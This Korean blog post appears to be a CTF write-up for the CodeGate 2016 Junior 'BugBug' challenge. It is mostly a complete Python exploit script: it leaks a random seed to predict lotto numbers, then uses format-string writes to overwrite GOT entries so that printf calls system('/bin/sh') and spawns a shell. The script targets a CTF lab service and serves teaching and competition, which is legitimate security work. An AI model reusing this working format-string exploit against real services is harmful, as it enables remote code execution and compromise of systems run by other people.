반응형
코드게이트 2016 주니어 BugBug
포멧 스트링 문제이다.
로또를 풀때 시드값을 릭하는 것은
Name 다음 바로 시드가 위치하기 때문에
Name을 체우게 되면 시드를 릭할 수 있다.
그 다음에는 포멧 스트링인데
첫번째 때 GOT를 하고 exit를 오버라이딩해서
system을 구하고 다시 이름을 입력 받는 부분으로 되돌아 간다
두번째 때 printf 를 system으로 오버라이딩한 다음
exit를 printf(Name)으로 돌려 system("/bin/sh")를 실행 시키게 한다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | from socket import * from time import * from struct import pack,unpack from ctypes import * p = lambda x: pack("<L",x) up = lambda x: unpack("<L",x)[0] connectto = ('192.168.226.130',9623) exit_got = 0x804a024 printf_got = 0x804a010 libc_start_got=0x804a02c back_scanf = 0x804883d back_printf = 0x8048960 def main(): libc = CDLL('libc.so.6') S = socket(AF_INET,SOCK_STREAM) S.connect(connectto) sleep(0.5) print S.recv(1024) # leak GOT, overwrite exit GOT to back_scan payload1 = "" payload1 += p(libc_start_got) payload1 += "%17$saaa" payload1 += p(exit_got) + p(exit_got+2) T = (back_scanf << 16) + 39 payload = "" for i in range(0,2): tmp = ((T >> (16*(i+1))) & 0xffff) - ((T >> (16*i)) & 0xffff) if tmp < 0: tmp += 0x10000 payload += "%"+str(tmp)+"c"+"%"+str(i+20)+"$n" payload1 += payload payload1 += "A"*(0x63-len(payload1))+'B' S.send(payload1) sleep(0.5) re = S.recv(1024) print re seed = up(re[re.find('B')+1:re.find('B')+5]) print "[*] Seed : "+str(hex(seed)) libc.srand(seed) # LOTTO Lotto = [] LottoS = "" length = 0 while length != 6: tmp = libc.rand() % 45 + 1 if tmp in Lotto: continue Lotto.append(tmp) LottoS+=str(tmp)+" " length+=1 print LottoS S.send(LottoS+"\n") sleep(1) leak = S.recv(102400) # LEAK print leak libc_start = up(leak[21:25]) print "[!] libc_start_main : "+str(hex(libc_start)) setvbuf = up(leak[25:29]) print "[!] setvbuf : "+str(hex(setvbuf)) system = libc_start - 0x19990 + 0x40190 print "[!] system : "+str(hex(system)) # NEW START # Overwrite printf_got to system sleep(0.5) payload2 = "" payload2 += "/bin/sh;" payload2 += p(printf_got) + p(printf_got+2) payload2 += p(exit_got) + p(exit_got+2) T = (((back_printf << 32) + system) << 16) + 24 payload = "" for i in range(0,4): tmp = ((T >> (16*(i+1))) & 0xffff) - ((T >> (16*i)) & 0xffff) if tmp < 0: tmp += 0x10000 payload += "%"+str(tmp)+"c"+"%"+str(i+20)+"$n" payload2 += payload payload2 += "A"*(0x63-len(payload2))+"B" S.send(payload2) print S.recv(1024) # LOTTO Lotto = [] LottoS = "" length = 0 while length != 6: tmp = libc.rand() % 45 + 1 if tmp in Lotto: continue Lotto.append(tmp) LottoS+=str(tmp)+" " length+=1 print LottoS S.send(LottoS+"\n") sleep(2) print S.recv(402400) print "Get Shell" S.send("id;\n") print S.recv(1024) if __name__ == "__main__": main() | cs |
'CTF' 카테고리의 다른 글
H3X0R - Stage1 (0) | 2017.01.08 |
---|---|
PlaidCTF 2016 quick (0) | 2016.04.18 |
CodeGate 2016 Junior JS_is_not_a_jail (0) | 2016.03.19 |
CodeGate 2016 Junior MICCheck (0) | 2016.03.19 |
DIMICON Write Up (0) | 2015.11.13 |